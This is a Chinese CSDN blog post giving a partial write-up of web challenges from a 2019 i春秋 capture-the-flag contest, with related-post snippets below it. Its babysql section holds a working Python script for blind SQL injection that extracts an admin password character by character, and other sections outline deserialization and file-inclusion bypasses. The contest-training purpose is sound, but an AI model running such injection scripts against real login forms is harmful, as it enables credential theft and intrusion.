i春秋网络内生安全试验场CTF夺旗赛(第二季)部分wp

最新推荐文章于 2024-05-05 22:13:22 发布
最新推荐文章于 2024-05-05 22:13:22 发布
阅读量918 收藏
点赞数
分类专栏: CTF 文章标签: i春秋 2019-10月CTF答题夺旗赛 部分wp
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42188168/article/details/102760623
版权

i春秋 2019-10月CTF答题夺旗赛 web部分wp

1.easyphp

在这里插入图片描述
通过观察可以发现img传参base64解码;同样的方法可得index.php源码
之后构造序列化。。。。。

2、calculate1,2
在这里插入图片描述
写wp前删掉了脚本,简述下:利用selenium运算公式并结合chromedriver进行10次提交

3、babysql
在这里插入图片描述
在这里插入图片描述
之后测试admin’orderby 1# 到3,直到4时
在这里插入图片描述
得知列数为3,通过fuzz发现union select可用,且页面返回第二列的内容即用户名,且常规注入不可行。尝试order by盲注,payload=admin’union select 1,2,‘c’ order by 3#。发现当字符小于等于密码时,显示2,当大于密码时显示admin。
由此写出脚本:

import requests
url = "http://120.55.43.255:13004/login.php"
print(hex(61))
flag = ""
for i in range(1, 50):
    print(i)
    end = 31
    head = 127
    while abs(head - end) > 1:
        mid = (end + head) // 2
        print(mid)
        data1 = flag + chr(mid)
        print(data1)
        sql = "admin'union select 1,2,0x{} order by 3#".format(data1.encode("hex"))
        s = requests.session()
        data = {
            'username': sql,
            'passwd': 'admin'
        }
        print(sql)
        result = requests.post(url=url, data=data)

        if "admin" in result.text:
            head = mid
        else:
            end = mid

    flag = flag + chr(end)

    print('flag:' + flag)
print("flag:" + flag)

在这里插入图片描述
这里要注意大小写,因为MySQL比较大小时是不区分的。
最后一位是d,因为最后一位时就是正确的admin的passwd应该往后取一位

4、best_language
在这里插入图片描述
进来就是代码审计,第一个点:提交%s即可绕过
第二个点:传参时第一个参数为first=’u’
第三个点:变量覆盖,查找参数为数组的变量覆盖的函数,发现了extract。
随即传参,可以由文件包含得到class.php源码。
在这里插入图片描述
上来看到前两行,PHP_SESSION_UPLOAD_PROGRESS的利用
构造表单,抓包改参数。
代码大致意思由Monitor反序列化触发Welcome的__toString魔术方法,接着用到Come的execute方法,有个substr的waf还是好绕的,/…/即可。
在这里插入图片描述
熟悉的flag,之后利用之前的文件包含获取flag。

5.easy_encode

在这里插入图片描述
看到102 且大部分在127下。尝试了ascii编码转换,得到flag

令狐东菱
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
i春秋Web wp
ChanCherry的博客
09-16 500
0x00 爆破-1 <?php include "flag.php"; $a = @$_REQUEST['hello']; if(!preg_match('/^\w*$/',$a )){ die('ERROR'); } eval("var_dump($$a);"); show_source(__FILE__); ?> 这个代码的意义是如果匹配正则/^\w*$/,就打印变量$$a。...
CTF答题夺旗赛(第四季)i春秋wp
JoJo48的博客
12-27 2200
i春秋CTF答题夺旗赛(4th) 地址:https://ictf.ichunqiu.com/ 1、Misc题 下载地址:http://120.55.43.255:34536/115FA9AF83B2997E/XImg.zip 解题思路:下载后是一张图片,因此觉得是图片隐写的可能性很大。先看图片本身的样子是不全的,所以有想法是不是要改变图片长、宽。还是老规矩先看看图片里有没有东西拖到虚拟机。 (1)...
i春秋wp
飞鱼的企鹅的博客
01-04 433
我会擦去因为太菜留下的泪水,还会装作一切都无所谓的样子! 爆破1 我是按照做题人数有多到少来做的,由简入繁嘛! 这道题需要传入参数hello,post和get方式都可以。做了一个简单的正则匹配,意思是输入字母或数字。主要看的是var_dump()这个函数。 所以这里就要用到超全局变量GLOBALS了,使用get或post方式传入 GLOBALS可以显示出来所有的变量,在里面可以找到flag...
攻防世界(CTF)~web-easyphp(江苏工匠杯)
m0_75030189的博客
05-05 742
这题刚开始感觉难度很大,但是仔细过了一遍就感觉单纯的是麻烦,没有什么拐弯抹角的,刷一次做个笔记留着
i春秋网络内生安全试验场CTF夺旗赛第二季部分Web题WriteUp
李熠专用博客_白帽子一枚,人称低危终结者
10-26 4572
1.easyphp 地址:http://120.55.43.255:13005/ 打开后查看源码,发现show.php。 该地址后有一个base64字符串,解码后内容为:hint.jpg 将首页地址index.php编码后,放到show.php可看到注释掉的php源码。 分析改源码可知,此题为反序列化的题,我们需要构造一个反序列化字符串的payload,通过clas...
i春秋 include wp
weixin_45253216的博客
01-16 164
继续水题 i春秋上的一道50分简单题目,提示是文件包含include。 记得原来做的文件包含题目,直接用php://filter就能把flag文件以base64编码的格式显示出来,这么简单一题,应该一样。 什么都没有,猜测在根目录下。 还是什么都没有,那咋办?估计flag被改名了,所以要查看目录结构,要知道PHP伪协议不只有read,还有input输入。 查看目录结构ls,然后就发现了一个贼丑的php文件,肯定是把flag的名改成这个了。 对返回的base64编码解码,果然flag。 ...
CTF Web解题大解密:如何找到神秘的Flag,成为夺旗赛的MVP
12-29
CTF,全称Capture The Flag,是一种网络安全竞赛,参赛者需在虚拟环境中寻找并夺取对方的旗帜。而Web解题,则是CTF比赛中的一种重要类型。 在CTF Web解题中,我们的目标是找到隐藏在网站中的Flag。这些Flag就像宝藏...
2020网鼎杯网络安全夺旗赛半决赛题目源代码
11-29
网络安全夺旗赛(Capture The Flag,简称CTF)是一种流行的网络安全竞技活动,旨在检验参赛者在网络安全领域的技能和知识。2020年的“网鼎杯”网络安全夺旗赛半决赛是一场备受瞩目的赛事,其独特的AWD PLUS模式更...
CTF - 第二届“陇剑杯”网络安全大赛线上赛部分write up
08-26
CTF-第二届“陇剑杯”网络安全大赛线上赛部分write up 本篇文章将围绕第二届“陇剑杯”网络安全大赛线上赛的 Write-up 进行详细的讲解,从中可以学到许多实用的网络安全知识。 首先,我们来看一下第一个题目,黑客...
ctf web解题 找flag夺旗赛概述、原理及应用.pdf
05-13
CTF(Capture The Flag,夺旗赛)在网络安全领域中是一种流行的技术竞技比赛形式,尤其在Web安全领域。以下是关于CTF Web解题、找flag夺旗赛的概述、原理及应用: 概述: CTF Web解题是CTF比赛中的一种题型,主要...
CTF夺旗赛.pdf
11-16
CTF夺旗赛.pdf
WP 4 i春秋_细说春秋
segOt
04-16 992
图穷匕见 纸上谈兵 窃符救赵 老马识途 东施效颦 大义灭亲 三令五申i春秋中一些非常简单的题目——传送门。题目的引子都是春秋战国时期的典故,也算应了网站名称的景,故事还是颇为有趣的,题目比较简单。图穷匕见题目给出了一个图片,如下:从题目名称就可以看出,这幅图的末尾应该附加了一些信息。打开发现果然如此 附加了一系列二进制串,ascii解码之后得到明显是url编码的东西,直接解码得到结果。(其中比较坑
网络内生安全试验场-12CTF圣诞赛Web
帅醉了的博客
01-17 491
1. nani http://120.55.43.255:24719/查看源码得以下内容,其URL提示文件包含 查看http://120.55.43.255:24719/index.php?file=show.php得 使用http://120.55.43.255:24719/index.php?file=php://filter/read=convert.base64-encode/resou...
Bugku、i春秋解题 web wp(一)
m0_55854679的博客
05-14 776
Simple_SSTI_1(python模板注入) 启动常见后只有一行字母,我们什么也看不出来。点击右键,查看网页源代码 倒数第三行绿色的字 <!-- You know, in the flask, We often set a secret_key variable.--> 意思是 你知道,在flask【一个Python编写的Web 微框架,让我们可以使用Python语言快速实现一个网站或Web服务。】里,我们经常设置一个secret_key变量,所以我们要读secret_key变量,导
i春秋新春公益战(部分wp
qq_43734081的博客
02-24 378
最近假期没事参加了比赛,写了wp Crytop 1.EaseyRSA 下载官方给的附件 是一个名为EasyRSA.py的文件 然后我们用py2x版本打开 看到这个样子,是不是觉得官方有点水,没错!!是的 直接附上我写好的RSA脚本 #! /usr/bin/env python2 # -*- coding: utf-8 -*- from libnum import n2s, s2n from ...
网络内生安全试验场-201909-SQL-wp
weixin_42444939的博客
09-19 325
fuzz发现几个重要过滤点 (包括 ’ , = , select , sleep 等) 以下为未过滤的sql注入关键词 那么现在来捋下思路,select被ban,意味着爆库名表名这条路走不通 考虑从爆password入手(当然,听学长说貌似也可以尝试堆叠,但我尝试后发现insert和sleep等被过滤,也就不再继续) 绕过细节: %20用/**/代替 substr和=的组合用regexp代替...
i春秋《从0到1:CTFer成长之路》通关WP
07-08 4374
1、常见的搜集 题目内容:一共3部分flag 使用目录扫描工具,如:7kb-webpathbrute对该URL进行扫描: 打开第一个URL: 发现flag文件flag1_is_her3_fun.txt文件,访问即可得到flag1:n1book{info_1 打开第二个URL: 可以得到flag2:s_v3ry_im 打开第3个URL,下载index.php.swp,打开可以得到第3个flag3:p0rtant_hack}: 组合即可得到完整flag:n1book{info_1
i春秋 百度杯 九场 SQLi wp
weixin_45253216的博客
01-18 195
菜鸡日常水题!! 2021.1.18 SQL注入的无逗号注入 SQL注入与HTTP重定向 本题目点进去后发现页面一直提示loading…,F12查看源码,发现了坑爹提示 这是提示了注入点呀??! 测试了各种注入,没啥收获。sqlmap跑一波,也啥都没有。 扫一波目录,看到了index.php和robots.txt 但是当我们输入index.php的时候,就会自己跳转到另一个页面 年少的我懵懂无知,跟本不知道发生了什么,也不知道在意这里。 于是只能查看大佬们的WP了。 大佬提示:这个logi
i春秋CTF web题(1)
weixin_30727835的博客
06-10 1290
之前边看writeup,边做实验吧的web题,多多少少有些收获。但是知识点都已记不清。所以这次借助i春秋这个平台边做题,就当记笔记一样写写writeup(其实都大部分还是借鉴其他人的writeup)。 本人小白一枚,于是从低分题(简单题)边学边做 这篇随笔会写4道题 0x01:爆破-1 0x02:爆破-2 0x03:爆破-3 0x04:upload 0x01:爆破-1 ...
ctf web解题 找flag夺旗赛
最新发布
05-14
CTF(Capture The Flag)比赛是一种网络安全技能竞赛,其中参赛者需要通过解决一系列的问题来获取特定的“flag”,通常会包括密码学、网络安全、二进制、逆向工程等多个领域。其中,Web领域的题目需要参赛者具备一定的Web开发基础知识,同时需要了解常见的Web攻击技巧,如SQL注入、XSS、CSRF等。 在Web领域的CTF比赛中,flag通常会隐藏在网站的某个地方,参赛者需要通过不同的攻击手段来获取。这些攻击手段包括但不限于:网站漏洞利用、目录遍历、文件包含、文件上传等。比如一个常见的题目是找到后台登录页面,并尝试进行SQL注入或者密码爆破来获取flag。 除了攻击手段,参赛者还需要具备一定的Web开发技能,如HTML、CSS、JavaScript等,以便于分析和理解网站的源代码,并针对性地进行攻击。 总之,Web领域的CTF比赛需要参赛者具备多方面的知识和技能,同时需要有较强的分析和解决问题的能力。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值